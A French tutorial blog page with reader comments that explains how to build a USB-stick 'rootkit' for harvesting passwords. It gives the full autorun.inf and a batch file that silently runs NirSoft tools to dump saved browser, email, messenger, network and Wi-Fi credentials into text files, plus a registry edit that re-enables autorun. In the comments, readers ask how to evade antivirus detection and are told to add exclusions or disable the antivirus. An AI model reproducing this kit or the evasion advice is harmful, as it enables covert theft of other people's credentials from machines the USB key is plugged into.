web page hit counter #69 Création d’un rootkit pour pirater les mots de passe d’un ordinateur. | Quick-Tutoriel.com
Jeudi 23 Mai 2013

#69 Création d’un rootkit pour pirater les mots de passe d’un ordinateur.

Le Webmaster 25 juillet 2009 Système & Réseaux 11min 57

Sous ce titre accrocheur, nous allons voir qu’avec un peut de bon sens, nous allons réaliser un script qui permet de scanner  et déchiffrer les mots de passe de votre PC à l’aide d’une clé USB. Bon je sais ce n’est pas conficker, mais bon.

Dans un premier temps, nous allons récupérer plusieurs logiciels qui nous permettent de déchiffrer les mots de passe des applications les plus courantes. Toutes ces applications sont issu du site Nirsoft (ici)

  • MessenPass: récupère les mots de passe de messagerie instantanée le plus populaire des programmes: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger avec Netscape 7, Trillian, Miranda, GAIM et.
  • Mail PassView: récupère les mots de passe des programmes de messagerie suivants: Outlook Express, Microsoft Outlook 2000 (comptes POP3 et SMTP uniquement), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP et SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.
  • IE Passview: IE PassView est un petit utilitaire qui révèle les mots de passe stockés par le navigateur Internet Explorer. Compatible avec le nouveau Internet Explorer 7.0, ainsi que les anciennes versions d’Internet Explorer v4.0 – v6.0
  • Protected Storage PassView: Récupère tous les mots de passe stockés dans le Protected Storage, y compris la saisie semi-automatique des mots de passe d’Internet Explorer, les mots de passe des sites protégés par mot de passe, mot de passe de MSN Explorer, et plus …
  • PasswordFox: PasswordFox est un petit outil qui vous permet d’afficher les noms d’utilisateur et mots de passe stockés par le navigateur Web Mozilla Firefox. Par défaut, PasswordFox affiche les mots de passe stockés dans votre profil actuel, mais vous pouvez facilement choisir de regarder les mots de passe de tout autre profil Firefox. Pour chaque mot de passe d’entrée, l’information suivante est affichée: Record Index, site web, nom d’utilisateur, mot de passe.
  • Network Password Recovery : Lorsque vous vous connectez à un partage réseau sur votre réseau local ou sur votre compte. NET Passport, Windows vous permet d’enregistrer votre mot de passe afin de l’utiliser à chaque fois que vous connectez sur le serveur distant. Cet utilitaire récupère tous les mots de passe réseau stockés sur votre système pour l’utilisateur connecté.
  • ChromePass : ChromePass est un petit outil qui vous permet d’afficher les noms d’utilisateur et mots de passe stockés par le navigateur Web Google Chrome. Pour chaque mot de passe, l’information suivante est affichée: URL Origine, URL action, le nom d’utilisateur, mot de passe et l’heure de création.
  • WirelessKeyView  : WirelessKeyView récupère toutes les clés de réseau sans fil / mots de passe (WEP / WPA) stockés dans votre ordinateur par le service ‘Wireless Zero Configuration’ de Windows XP et par le service ‘WLAN AutoConfig’ de Windows Vista.

Créer un dossier RootKit sur votre bureau et téléchargez toutes les applications ci-dessus dedans.

Rootkit_USB_1

Ensuite décompresser toutes les archives et gardez que les exécutable (.exe)

Rootkit_USB_2

Copiez tous les fichiers .exe du répertoire à la racine de votre clé USB.

Rootkit_USB_3

Ouvrer le bloc-note de windows et copier le texte suivant

[autorun]
open = launch.bat
ACTION = Scan Passwords

Rootkit_USB_4

Puis enregistrez le fichier sous la racine de la clé sous le nom autorun.inf

Ouvrer un autre bloc-note et copier le texte suivant :

start ChromePass.exe /stext ChromePass.txt
start iepv.exe /stext iepv.txt
start mailpv.exe /stext mailpv.txt
start mspass.exe /stext mspass.txt
start netpass.exe /stext netpass.txt
start PasswordFox.exe /stext PasswordFox.txt
start pspv.exe /stext pspv.txt
start WirelessKeyView.exe /stext WirelessKeyView.txt

Ensuite enregistrer votre document à la racine de votre clé, sous le nom de launch.bat

Rootkit_USB_6

Votre rootkit est maintenant prêt. Nous allons le tester.

Sur certain ordinateur, comme le mien par exemple j’ai désactivé l’autorun, pour ce tutoriel je vais le réactiver. Ce rootkit fonctionne quand même il suffit juste dans le poste de travail de cliquer sur le fichier launch.bat pour lancer le rootkit, si l’autorun est désactivé.

Pour activer l’autorun pour tous les lecteurs, aller dans Menu Démarrer → Exécuter → (taper regedit.exe)

Dans l’arborescence de la base de registre aller dans : [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer] et modifier la clé suivante, avec la valeur 91 « NoDriveTypeAutoRun »=dword:00000091

Rootkit_USB_7

Redémarrer le PC. Ensuite insérer votre clé USB, un menu s’affiche et sélectionner Scan Password, la première option.

Rootkit_USB_8

Maintenant, tous les outils de récupération de mot de passe seront exécutés silencieusement en arrière-plan (ce processus ne prend que quelques secondes). Les mots de passe sont stockés dans les fichiers .TXT.

Rootkit_USB_9

Vous n’avez plus qu’a les ouvrir et voir les mots de passe déchiffrer. Je vous conseil de visiter régulièrement le site de NirSoft car des mises à jour ainsi que des nouveaux logiciels sortent souvent.

That’s All.

Difficulté : Débutant
Modification : -
Crédits : -

Print This Post


Vous avez aimé cet article ! Partager-le avec vos amis !

   
   

57 Potins

  1. Le Webmaster 2 avril 2012 at 7:44

    Bonjour,

    Depuis les nouveaux tutoriels j’ai abandonné de marquer la difficulté.

    A bientôt.

  2. Patts 11 juillet 2012 at 12:04

    Bonjour, impossible de renommer le fichier txt en .bat, il disparait, que ce soit avec seven ou xp, donc la clé ne peut marcher puisque n’apparait pas « lancer scan ».
    oublié quelque chose.? ?
    cordialement

  3. nico 12 juillet 2012 at 12:01

    salut! Conment on peut faire pour eviter la detection par l’antivirus
    Merci

  4. mell 21 juillet 2012 at 11:03

    simple tu ajoute une exclusion dans l’antivirus, du chemin ou ce trouve les exe nirsoft. enfin si tu a la main sur l’antivirus bien sur !

  5. Hijacked 14 février 2013 at 22:01

    Bonjour, d’abord merci pour ce tuto. ça marche très bien. j’ai juste un problème avec l’autorun. J’ai testé la clé sur xp, 7 et vista et quand je met la clé dans le port on me demande ce que je veux faire comme d’habitude. mais il n’y a pas le scan passwords. comment faire?

  6. tacos5555 6 mars 2013 at 19:45

    jai un problème quand je veux enregistrer le fichier launch.bat mon antivirus détecte un cheval de trois !!
    que faire

  7. hackme:) 27 mars 2013 at 15:04

    t’inquiète pas c’est normal il faut que tu désactive ton antivirus lorsque tu le fait

Laisser un potin